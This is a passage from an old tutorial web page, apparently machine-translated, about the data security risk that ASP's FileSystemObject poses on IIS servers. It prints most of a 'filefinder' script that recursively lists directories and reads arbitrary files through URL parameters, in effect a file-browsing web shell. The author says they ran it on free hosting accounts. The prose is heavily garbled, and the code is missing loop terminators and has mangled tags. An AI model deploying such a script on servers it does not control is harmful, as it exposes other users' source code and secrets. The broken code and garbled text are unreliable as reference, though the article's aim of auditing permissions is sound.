Tutorials to .com

Tutorials to .com » Asp » Fso » FSO object of ASP in IIS WEB server data security threats and countermeasures

FSO object of ASP in IIS WEB server data security threats and countermeasures

Print View , by: iSee ,Total views: 11 ,Word Count: 1099 ,Date: Thu, 16 Apr 2009 Time: 4:41 AM

scripting.filesystemobject is provided by many scrrun.dll for vbscript / jscript control one of the com object. scripting.filesystemobject provide a very convenient directory of text files and access, but also data on the iis web server a certain security threats.

filefinder code is very simple, by the three functions and the order of about 30 firms constitute the code.

Findfiles the most critical function is through the realization of its recursive calls to a directory traversal, and in accordance with the specific file name extension to search for these documents.

function findfiles (strstartfolder, strext)

dim n

dim othisfolder

dim ofolders

dim ofiles

dim ofolder

dim ofile

'If the system administrator permissions on the file system set up to carry out detailed, then the following error code will be

'But some can still see the directory, so we simply ignore the error over the past

on error resume next

n = 0

response.write "<b> searching" & strstartfolder & "</ b> <br>"

set othisfolder = g_fs.getfolder (strstartfolder)

set ofiles = othisfolder.files

for each ofile in ofiles

'If that is the file extension specified, the output connection-oriented per se, but use different command cmd

'Here is the cmd = read, that is, read out the physical path of the specified text file

if issuffix (ofile.path, strext) then

response.write "<a target=_blank href='ff.asp?cmd=read&path=" & server.htmlencode(ofile.path) & "'> <font color='dodgerblue'>" & ofile.path & "< / font> </ a> <br> "

if err = 0 then

n = n + 1

end if

end if


set ofolders = othisfolder.subfolders

for each ofolder in ofolders

n = n + findfiles (ofolder.path, strext)


findfiles = n

end function

The following is the code behind the url parameters for analysis:

'Read out the value of each parameter

strcmd = ucase (request.querystring ( "cmd"))

strpath = request.querystring ( "path")

strext = request.querystring ( "ext")

brawdata = ucase (request.querystring ( "raw"))

'Default search. asp files

if strpath = "" then

strpath = "."

end if

if strext = "" then

strext = ". asp"

end if

'Cmd command, depending on the implementation of different code

select case strcmd

case "find"

response.write findfiles (strpath, strext) & "file (s) found"

case "read"

if brawdata = "t" then

response.write readtextfile (strpath)


response.write "<pre>" & server.htmlencode (readtextfile (strpath)) & "</ pre>"

end if

case else

response.write "<h3> please specify a command to execute </ h3>"

end select

From the above analysis we can see, if it has sufficient authority, then we can filefinder to find the iis web server arbitrary text files, and can easily see the contents of the documents. For non-text files, to determine whether they exist and where the path, which is high-level hacker to run, sometimes the information is extremely important.

However, these threats to data security is a prerequisite for the implementation of the user at least ff.asp directories and files have read permissions. As the Windows NT server after installation is the default security settings for all users can "read" directories and files, so whether you iis default user iusr_servername or any other user can read-line directories and files information. Windows nt server and most of the major concerns the system administrator can run up, the general reluctance to change the default directory and file permissions to do so, after all, take great risks, but also have the experience many times. Therefore, we can use to check filefinder as a web server nt server's file system security settings are safe.

Author specialized iis web server as the file system permissions to carry out manual settings, but limited to no experience, resulting in a lot of strange errors, such as: experiments using the nt server 4.0 can not access database. In doing so prior to the change file system permissions, the function is normal.

In a purely objective of the study, the authors are still free to apply for I made a test asp space (including the provision of csdn my personal home page), the result is a smooth operation can be filefinder. Http://www2.domaindlx.com/index.html applications in the personal home page but do not have this problem, we can see the free home page provider asp to do in this regard is quite serious. Although domaindlx run on the web server on Windows 2000 server, the default file system permissions and the security nt 4.0 is not very different.

Due to the limited capacity of the author, to discuss this issue on here. This article only to domestic providers asp, based on the home page, hoping to providers and customers of data security on both sides have to help.

By-laws: with other similar server-side script to run the web service, if scripting.filesystemobject also provide similar operation on the file system functions, no matter what the platform should be the same problem exists.

ASP File System Object Articles

Can't Find What You're Looking For?

Rating: Not yet rated


No comments posted.